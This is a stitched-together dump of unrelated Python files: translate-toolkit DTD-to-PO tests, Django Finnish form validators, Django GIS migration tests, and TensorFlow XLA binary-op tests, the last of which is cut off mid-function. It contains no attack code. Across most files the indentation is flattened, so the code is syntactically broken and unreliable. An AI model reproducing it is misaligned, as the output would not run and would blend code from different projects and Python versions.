dtdsource = '''<!-- LOCALIZATION NOTE (mainWindow.title): DONT_TRANSLATE -->
<!ENTITY mainWindow.title "&brandFullName;">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_donttranslate_commentedout(self):
"""check that we don't process messages in <!-- comments -->: bug 102"""
dtdsource = '''<!-- commenting out until bug 38906 is fixed
<!ENTITY messagesHeader.label "Messages"> -->'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_spaces_at_start_of_dtd_lines(self):
"""test that pretty print spaces at the start of subsequent DTD element lines are removed from the PO file, bug 79"""
# Space at the end of the line
dtdsource = '<!ENTITY noupdatesfound.intro "First line then \n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
        # We still need to decide how we handle line breaks in the DTD entities. It seems that we should
        # actually drop the line break but this has not been implemented yet.
assert pounit.source == "First line then \nnext lines."
# No space at the end of the line
dtdsource = '<!ENTITY noupdatesfound.intro "First line then\n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "First line then \nnext lines."
def test_accesskeys_folding(self):
"""test that we fold accesskeys into message strings"""
dtdsource_template = '<!ENTITY fileSaveAs.%s "Save As...">\n<!ENTITY fileSaveAs.%s "S">\n'
lang_template = '<!ENTITY fileSaveAs.%s "Gcina ka...">\n<!ENTITY fileSaveAs.%s "G">\n'
for label in ("label", "title"):
for accesskey in ("accesskey", "accessKey", "akey"):
pofile = self.dtd2po(dtdsource_template % (label, accesskey))
pounit = self.singleelement(pofile)
assert pounit.source == "&Save As..."
# Test with template (bug 155)
pofile = self.dtd2po(lang_template % (label, accesskey), dtdsource_template % (label, accesskey))
pounit = self.singleelement(pofile)
assert pounit.source == "&Save As..."
assert pounit.target == "&Gcina ka..."
def test_accesskeys_mismatch(self):
"""check that we can handle accesskeys that don't match and thus can't be folded into the .label entry"""
dtdsource = '<!ENTITY fileSave.label "Save">\n' + \
'<!ENTITY fileSave.accesskey "z">\n'
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 2
def test_carriage_return_in_multiline_dtd(self):
"""test that we create nice PO files when we find a \r\n in a multiline DTD element"""
dtdsource = '<!ENTITY noupdatesfound.intro "First line then \r\n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == "First line then \nnext lines."
def test_multiline_with_blankline(self):
"""test that we can process a multiline entity that has a blank line in it, bug 331"""
dtdsource = '''
<!ENTITY multiline.text "
Some text
Some other text
">'''
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == "Some text \n \nSome other text"
    def test_multiline_closing_quotes(self):
"""test that we support various styles and spaces after closing quotes on multiline entities"""
dtdsource = '''
<!ENTITY pref.plural '<span>opsies</span><span
class="noWin">preferences</span>' >
'''
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == '<span>opsies</span><span \nclass="noWin">preferences</span>'
def test_preserving_spaces(self):
"""test that we preserve space that appear at the start of the first line of a DTD entity"""
# Space before first character
dtdsource = '<!ENTITY mainWindow.titlemodifiermenuseparator " - ">'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == " - "
# Double line and spaces
dtdsource = '<!ENTITY mainWindow.titlemodifiermenuseparator " - with a newline\n and more text">'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
print repr(unit.source)
assert unit.source == " - with a newline \nand more text"
def test_escaping_newline_tabs(self):
"""test that we handle all kinds of newline permutations"""
dtdsource = '<!ENTITY noupdatesfound.intro "A hard coded newline.\\nAnd tab\\t and a \\r carriage return.">\n'
converter = dtd2po.dtd2po()
thedtd = dtd.dtdunit()
thedtd.parse(dtdsource)
thepo = po.pounit()
converter.convertstrings(thedtd, thepo)
print thedtd
print thepo.source
# \n in a dtd should also appear as \n in the PO file
assert thepo.source == r"A hard coded newline.\nAnd tab\t and a \r carriage return."
def test_abandoned_accelerator(self):
"""test that when a language DTD has an accelerator but the template DTD does not that we abandon the accelerator"""
dtdtemplate = '<!ENTITY test.label "Test">\n'
dtdlanguage = '<!ENTITY test.label "Toets">\n<!ENTITY test.accesskey "T">\n'
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
unit = self.singleelement(pofile)
assert unit.source == "Test"
assert unit.target == "Toets"
def test_unassociable_accelerator(self):
"""test to see that we can handle accelerator keys that cannot be associated correctly"""
dtdsource = '<!ENTITY managecerts.button "Manage Certificates...">\n<!ENTITY managecerts.accesskey "M">'
pofile = self.dtd2po(dtdsource)
assert pofile.units[1].source == "Manage Certificates..."
assert pofile.units[2].source == "M"
pofile = self.dtd2po(dtdsource, dtdsource)
assert pofile.units[1].target == "Manage Certificates..."
assert pofile.units[2].target == "M"
def test_changed_labels_and_accelerators(self):
"""test to ensure that when the template changes an entity name we can still manage the accelerators"""
dtdtemplate = '''<!ENTITY managecerts.caption "Manage Certificates">
<!ENTITY managecerts.text "Use the Certificate Manager to manage your personal certificates, as well as those of other people and certificate authorities.">
<!ENTITY managecerts.button "Manage Certificates...">
<!ENTITY managecerts.accesskey "M">'''
dtdlanguage = '''<!ENTITY managecerts.label "ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ">
<!ENTITY managecerts.text "ﺎﺴﺘﺧﺪﻣ ﻡﺪﻳﺭ ﺎﻠﺸﻫﺍﺩﺎﺗ ﻹﺩﺍﺭﺓ ﺶﻫﺍﺩﺎﺘﻛ ﺎﻠﺸﺨﺼﻳﺓ، ﺏﺍﻺﺿﺎﻓﺓ ﻞﺘﻠﻛ ﺎﻠﺧﺎﺻﺓ ﺏﺍﻶﺧﺮﻴﻧ ﻭ ﺲﻠﻃﺎﺗ ﺎﻠﺸﻫﺍﺩﺎﺗ.">
<!ENTITY managecerts.button "ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ...">
<!ENTITY managecerts.accesskey "ﺩ">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[3].source == "Manage Certificates..."
assert pofile.units[3].target == u"ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ..."
assert pofile.units[4].source == "M"
assert pofile.units[4].target == u"ﺩ"
def wtest_accelerator_keys_not_in_sentence(self):
"""tests to ensure that we can manage accelerator keys that are not part of the transated sentence eg in Chinese"""
dtdtemplate = '''<!ENTITY useAutoScroll.label "Use autoscrolling">
<!ENTITY useAutoScroll.accesskey "a">'''
dtdlanguage = '''<!ENTITY useAutoScroll.label "使用自動捲動(Autoscrolling)">
<!ENTITY useAutoScroll.accesskey "a">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].target == "使用自動捲動(&Autoscrolling)"
# We assume that accesskeys with no associated key should be done as follows "XXXX (&A)"
# TODO - check that we can unfold this from PO -> DTD
dtdlanguage = '''<!ENTITY useAutoScroll.label "使用自動捲動">
<!ENTITY useAutoScroll.accesskey "a">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].target == "使用自動捲動 (&A)"
def test_exclude_entity_includes(self):
"""test that we don't turn an include into a translatable string"""
dtdsource = '<!ENTITY % brandDTD SYSTEM "chrome://branding/locale/brand.dtd">'
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_linewraps(self):
"""check that redundant line wraps are removed from the po file"""
dtdsource = '''<!ENTITY generic.longDesc "
<p>Test me.</p>
">'''
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "<p>Test me.</p>"
def test_merging_with_new_untranslated(self):
"""test that when we merge in new untranslated strings with existing translations we manage the encodings properly"""
# This should probably be in test_po.py but was easier to do here
dtdtemplate = '''<!ENTITY unreadFolders.label "Unread">\n<!ENTITY viewPickerUnread.label "Unread">\n<!ENTITY unreadColumn.label "Unread">'''
dtdlanguage = '''<!ENTITY viewPickerUnread.label "Непрочетени">\n<!ENTITY unreadFolders.label "Непрочетени">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].source == "Unread"
def test_merge_without_template(self):
"""test that we we manage the case where we merge and their is no template file"""
# If we supply a template file we should fail if the template file does not exist or is blank. We should
# not put the translation in as the source.
# TODO: this test fails, since line 16 checks for "not dtdtemplate"
# instead of checking for "dtdtemplate is None". What is correct?
dtdtemplate = ''
dtdsource = '<!ENTITY no.template "Target">'
pofile = self.dtd2po(dtdsource, dtdtemplate)
print pofile
assert self.countelements(pofile) == 0
class TestDTD2POCommand(test_convert.TestConvertCommand, TestDTD2PO):
"""Tests running actual dtd2po commands on files"""
convertmodule = dtd2po
defaultoptions = {"progress": "none"}
def test_help(self):
"""tests getting help"""
options = test_convert.TestConvertCommand.test_help(self)
options = self.help_check(options, "-P, --pot")
options = self.help_check(options, "-t TEMPLATE, --template=TEMPLATE")
options = self.help_check(options, "--duplicates=DUPLICATESTYLE", last=True)
|
"""
FI-specific Form helpers
"""
from __future__ import absolute_import, unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
from .fi_municipalities import MUNICIPALITY_CHOICES
class FIZipCodeField(RegexField):
"""
A form field that validates input as a Finnish zip code. Valid codes
consist of five digits.
"""
default_error_messages = {
'invalid': _('Enter a zip code in the format XXXXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(FIZipCodeField, self).__init__(r'^\d{5}$',
max_length, min_length, *args, **kwargs)
class FIMunicipalitySelect(Select):
"""
A Select widget that uses a list of Finnish municipalities as its choices.
"""
def __init__(self, attrs=None):
super(FIMunicipalitySelect, self).__init__(attrs, choices=MUNICIPALITY_CHOICES)
class FISocialSecurityNumber(Field):
"""A form field that validates input as a Finnish social security number."""
default_error_messages = {
'invalid': _('Enter a valid Finnish social security number.'),
}
def clean(self, value):
super(FISocialSecurityNumber, self).clean(value)
if value in EMPTY_VALUES:
return ''
checkmarks = "0123456789ABCDEFHJKLMNPRSTUVWXY"
result = re.match(r"""^
(?P<date>([0-2]\d|3[01])
(0\d|1[012])
(\d{2}))
[A+-]
(?P<serial>(\d{3}))
(?P<checksum>[%s])$""" % checkmarks, value, re.VERBOSE | re.IGNORECASE)
if not result:
raise ValidationError(self.error_messages['invalid'])
gd = result.groupdict()
checksum = int(gd['date'] + gd['serial'])
if checkmarks[checksum % len(checkmarks)] == gd['checksum'].upper():
return '%s' % value.upper()
raise ValidationError(self.error_messages['invalid'])
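# Worked example of the checksum rule used above (illustrative): the check
# character is checkmarks[int(ddmmyy + serial) % 31]. For the well-known test
# number 131052-308T, int('131052308') % 31 == 25 and checkmarks[25] == 'T'.
if __name__ == '__main__':
    _marks = "0123456789ABCDEFHJKLMNPRSTUVWXY"
    assert _marks[int("131052" + "308") % 31] == "T"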
|
from unittest import skipUnless
from django.contrib.gis.db.models import fields
from django.contrib.gis.geos import MultiPolygon, Polygon
from django.core.exceptions import ImproperlyConfigured
from django.db import connection, migrations, models
from django.db.migrations.migration import Migration
from django.db.migrations.state import ProjectState
from django.test import (
TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
try:
GeometryColumns = connection.ops.geometry_columns()
HAS_GEOMETRY_COLUMNS = True
except NotImplementedError:
HAS_GEOMETRY_COLUMNS = False
class OperationTestCase(TransactionTestCase):
available_apps = ['gis_tests.gis_migrations']
def tearDown(self):
# Delete table after testing
if hasattr(self, 'current_state'):
self.apply_operations('gis', self.current_state, [migrations.DeleteModel('Neighborhood')])
super().tearDown()
@property
def has_spatial_indexes(self):
if connection.ops.mysql:
with connection.cursor() as cursor:
return connection.introspection.supports_spatial_index(cursor, 'gis_neighborhood')
return True
def get_table_description(self, table):
with connection.cursor() as cursor:
return connection.introspection.get_table_description(cursor, table)
def assertColumnExists(self, table, column):
self.assertIn(column, [c.name for c in self.get_table_description(table)])
def assertColumnNotExists(self, table, column):
self.assertNotIn(column, [c.name for c in self.get_table_description(table)])
def apply_operations(self, app_label, project_state, operations):
migration = Migration('name', app_label)
migration.operations = operations
with connection.schema_editor() as editor:
return migration.apply(project_state, editor)
def set_up_test_model(self, force_raster_creation=False):
test_fields = [
('id', models.AutoField(primary_key=True)),
('name', models.CharField(max_length=100, unique=True)),
('geom', fields.MultiPolygonField(srid=4326))
]
if connection.features.supports_raster or force_raster_creation:
test_fields += [('rast', fields.RasterField(srid=4326, null=True))]
operations = [migrations.CreateModel('Neighborhood', test_fields)]
self.current_state = self.apply_operations('gis', ProjectState(), operations)
def assertGeometryColumnsCount(self, expected_count):
self.assertEqual(
GeometryColumns.objects.filter(**{
'%s__iexact' % GeometryColumns.table_name_col(): 'gis_neighborhood',
}).count(),
expected_count
)
def assertSpatialIndexExists(self, table, column, raster=False):
with connection.cursor() as cursor:
constraints = connection.introspection.get_constraints(cursor, table)
if raster:
self.assertTrue(any(
'st_convexhull(%s)' % column in c['definition']
for c in constraints.values()
if c['definition'] is not None
))
else:
self.assertIn([column], [c['columns'] for c in constraints.values()])
def alter_gis_model(self, migration_class, model_name, field_name,
blank=False, field_class=None, field_class_kwargs=None):
args = [model_name, field_name]
if field_class:
field_class_kwargs = field_class_kwargs or {'srid': 4326, 'blank': blank}
args.append(field_class(**field_class_kwargs))
operation = migration_class(*args)
old_state = self.current_state.clone()
operation.state_forwards('gis', self.current_state)
with connection.schema_editor() as editor:
operation.database_forwards('gis', editor, old_state, self.current_state)
class OperationTests(OperationTestCase):
def setUp(self):
super().setUp()
self.set_up_test_model()
def test_add_geom_field(self):
"""
Test the AddField operation with a geometry-enabled column.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'path', False, fields.LineStringField)
self.assertColumnExists('gis_neighborhood', 'path')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(2)
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'path')
@skipUnless(HAS_GEOMETRY_COLUMNS, "Backend doesn't support GeometryColumns.")
def test_geom_col_name(self):
self.assertEqual(
GeometryColumns.geom_col_name(),
'column_name' if connection.ops.oracle else 'f_geometry_column',
)
@skipUnlessDBFeature('supports_raster')
def test_add_raster_field(self):
"""
Test the AddField operation with a raster-enabled column.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'heatmap', False, fields.RasterField)
self.assertColumnExists('gis_neighborhood', 'heatmap')
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'heatmap', raster=True)
def test_add_blank_geom_field(self):
"""
Should be able to add a GeometryField with blank=True.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'path', True, fields.LineStringField)
self.assertColumnExists('gis_neighborhood', 'path')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(2)
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'path')
@skipUnlessDBFeature('supports_raster')
def test_add_blank_raster_field(self):
"""
Should be able to add a RasterField with blank=True.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'heatmap', True, fields.RasterField)
self.assertColumnExists('gis_neighborhood', 'heatmap')
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'heatmap', raster=True)
def test_remove_geom_field(self):
"""
Test the RemoveField operation with a geometry-enabled column.
"""
self.alter_gis_model(migrations.RemoveField, 'Neighborhood', 'geom')
self.assertColumnNotExists('gis_neighborhood', 'geom')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(0)
@skipUnlessDBFeature('supports_raster')
def test_remove_raster_field(self):
"""
Test the RemoveField operation with a raster-enabled column.
"""
self.alter_gis_model(migrations.RemoveField, 'Neighborhood', 'rast')
self.assertColumnNotExists('gis_neighborhood', 'rast')
def test_create_model_spatial_index(self):
if not self.has_spatial_indexes:
self.skipTest('No support for Spatial indexes')
self.assertSpatialIndexExists('gis_neighborhood', 'geom')
if connection.features.supports_raster:
self.assertSpatialIndexExists('gis_neighborhood', 'rast', raster=True)
@skipUnlessDBFeature('can_alter_geometry_field', 'supports_3d_storage')
def test_alter_geom_field_dim(self):
Neighborhood = self.current_state.apps.get_model('gis', 'Neighborhood')
p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
Neighborhood.objects.create(name='TestDim', geom=MultiPolygon(p1, p1))
# Add 3rd dimension.
self.alter_gis_model(
migrations.AlterField, 'Neighborhood', 'geom', False,
fields.MultiPolygonField, field_class_kwargs={'srid': 4326, 'dim': 3}
)
self.assertTrue(Neighborhood.objects.first().geom.hasz)
# Rewind to 2 dimensions.
self.alter_gis_model(
migrations.AlterField, 'Neighborhood', 'geom', False,
fields.MultiPolygonField, field_class_kwargs={'srid': 4326, 'dim': 2}
)
self.assertFalse(Neighborhood.objects.first().geom.hasz)
@skipIfDBFeature('supports_raster')
class NoRasterSupportTests(OperationTestCase):
def test_create_raster_model_on_db_without_raster_support(self):
msg = 'Raster fields require backends with raster support.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.set_up_test_model(force_raster_creation=True)
def test_add_raster_field_on_db_without_raster_support(self):
msg = 'Raster fields require backends with raster support.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.set_up_test_model()
self.alter_gis_model(
migrations.AddField, 'Neighborhood', 'heatmap',
False, fields.RasterField
)
|
"""Test cases for binary operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class BinaryOpsTest(XLATestCase):
"""Test cases for binary operators."""
def _testBinary(self, op, a, b, expected, equality_test=None):
with self.test_session() as session:
with self.test_scope():
pa = array_ops.placeholder(dtypes.as_dtype(a.dtype), a.shape, name="a")
pb = array_ops.placeholder(dtypes.as_dtype(b.dtype), b.shape, name="b")
output = op(pa, pb)
result = session.run(output, {pa: a, pb: b})
if equality_test is None:
equality_test = self.assertAllClose
equality_test(result, expected, rtol=1e-3)
def ListsAreClose(self, result, expected, rtol):
"""Tests closeness of two lists of floats."""
self.assertEqual(len(result), len(expected))
for i in range(len(result)):
self.assertAllClose(result[i], expected[i], rtol)
def testFloatOps(self):
for dtype in self.float_types:
self._testBinary(
gen_math_ops._real_div,
np.array([3, 3, -1.5, -8, 44], dtype=dtype),
np.array([2, -2, 7, -4, 0], dtype=dtype),
expected=np.array(
[1.5, -1.5, -0.2142857, 2, float("inf")], dtype=dtype))
self._testBinary(math_ops.pow, dtype(3), dtype(4), expected=dtype(81))
self._testBinary(
math_ops.pow,
np.array([1, 2], dtype=dtype),
np.zeros(shape=[0, 2], dtype=dtype),
expected=np.zeros(shape=[0, 2], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([10, 4], dtype=dtype),
np.array([2, 3], dtype=dtype),
expected=np.array([100, 64], dtype=dtype))
self._testBinary(
math_ops.pow,
dtype(2),
np.array([3, 4], dtype=dtype),
expected=np.array([8, 16], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([[2], [3]], dtype=dtype),
dtype(4),
expected=np.array([[16], [81]], dtype=dtype))
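      # The *_grad ops below take (y, dy) and implement closed-form gradients:
      #   sigmoid_grad(y, dy) = dy * y * (1 - y),  e.g. 5 * 4 * (1 - 4) = -60
      #   rsqrt_grad(y, dy)   = -dy * y**3 / 2,    e.g. -5 * 4**3 / 2   = -160
      #   tanh_grad(y, dy)    = dy * (1 - y**2),   e.g. 5 * (1 - 4**2)  = -75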
self._testBinary(
gen_math_ops._sigmoid_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-60, -36, -14, 0], dtype=dtype))
self._testBinary(
gen_math_ops._rsqrt_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-160, -81, -28, -4], dtype=dtype))
self._testBinary(
gen_nn_ops._softplus_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array(
[3.97322869, 2.99258232, 1.99817801, 0.99966466], dtype=dtype))
self._testBinary(
gen_math_ops._tanh_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-75, -48, -21, 0], dtype=dtype))
self._testBinary(
gen_nn_ops._elu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
np.array([-.6, -.4, -.2, 0, .2, .4], dtype=dtype),
expected=np.array([0.4, 1.2, 2.4, 4, 5, 6], dtype=dtype))
self._testBinary(
gen_nn_ops._selu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
np.array([-.6, -.4, -.2, .2, .4, .6], dtype=dtype),
expected=np.array(
[1.158099340847, 2.7161986816948, 4.67429802254,
4.202803949422, 5.2535049367774, 6.30420592413], dtype=dtype))
self._testBinary(
gen_nn_ops._relu_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=dtype),
np.array([0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10], dtype=dtype))
self._testBinary(
gen_nn_ops._relu6_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=dtype),
np.array(
[0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9, 6.1, 10.0], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10, 0, 0], dtype=dtype))
self._testBinary(
gen_nn_ops._softmax_cross_entropy_with_logits,
np.array([[1, 2, 3, 4], [5, 6, 7, 8]], dtype=dtype),
np.array([[0.1, 0.2, 0.3, 0.4], [0.4, 0.3, 0.2, 0.1]], dtype=dtype),
expected=[
np.array([1.44019, 2.44019], dtype=dtype),
np.array([[-0.067941, -0.112856, -0.063117, 0.243914],
[-0.367941, -0.212856, 0.036883, 0.543914]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
self._testBinary(
gen_nn_ops._sparse_softmax_cross_entropy_with_logits,
np.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8],
[0.9, 1.0, 1.1, 1.2]], dtype=dtype),
np.array([2, 1, 7], dtype=np.int32),
expected=[
np.array([1.342536, 1.442536, np.nan], dtype=dtype),
np.array([[0.213838, 0.236328, -0.738817, 0.288651],
[0.213838, -0.763672, 0.261183, 0.288651],
[np.nan, np.nan, np.nan, np.nan]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
def testIntOps(self):
for dtype in self.int_types:
self._testBinary(
gen_math_ops._truncate_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -1, 0, -4, 2], dtype=dtype))
def testNumericOps(self):
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([11, 22], dtype=dtype))
self._testBinary(
math_ops.add,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([6, 7], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[8], [9]], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([-9, -18], dtype=dtype))
self._testBinary(
math_ops.subtract,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([4, 3], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[-6], [-5]], dtype=dtype))
self._testBinary(
math_ops.maximum,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([10, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[10], [7]], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 2], dtype=dtype))
self._testBinary(
math_ops.minimum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([1, 5], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[7], [2]], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([10, 40], dtype=dtype))
self._testBinary(
math_ops.multiply,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 100], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[70], [14]], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([81, 324], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([16, 9], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[36], [25]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[3, 1], [5, 3]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[[[1, 2], [3, 4]]]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[[[3, 1], [5, 3]]]], dtype=dtype))
def _testDivision(self, dtype):
"""Test cases for division operators."""
self._testBinary(
math_ops.div,
np.array([10, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 10], dtype=dtype))
self._testBinary(
math_ops.div,
dtype(40),
np.array([2, 20], dtype=dtype),
expected=np.array([20, 2], dtype=dtype))
self._testBinary(
math_ops.div,
np.array([[10], [4]], dtype=dtype),
dtype(2),
expected=np.array([[5], [2]], dtype=dtype))
self._testBinary(
gen_math_ops._floor_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -2, -1, -5, 2], dtype=dtype))
def testIntDivision(self):
for dtype in self.int_types:
self._testDivision(dtype)
def testFloatDivision(self):
for dtype in self.float_types:
self._testDivision(dtype)
def _testRemainder(self, dtype):
"""Test cases for remainder operators."""
self._testBinary(
gen_math_ops._floor_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, -1, 6, 0], dtype=dtype))
self._testBinary(
gen_math_ops._truncate_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, 1, -1, 0], dtype=dtype))
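    # floor_mod's result takes the sign of the divisor while truncate_mod's
    # takes the sign of the dividend, mirroring floor vs. truncating division.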
def testIntRemainder(self):
for dtype in self.int_types:
self._testRemainder(dtype)
def testFloatRemainder(self):
for dtype in self.float_types:
self._testRemainder(dtype)
def testLogicalOps(self):
self._testBinary(
math_ops.logical_and,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[False, False], [False, True]], dtype=np.bool))
self._testBinary(
math_ops.logical_or,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[True, True], [False, True]], dtype=np.bool))
def testComparisons(self):
self._testBinary(
math_ops.equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [False]], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [True]], dtype=np.bool))
for greater_op in [math_ops.greater, (lambda x, y: x > y)]:
self._testBinary(
greater_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
greater_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
greater_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [False]], dtype=np.bool))
for greater_equal_op in [math_ops.greater_equal, (lambda x, y: x >= y)]:
self._testBinary(
greater_equal_op,
np.array([1, 5, 20], dtype=np.float32),
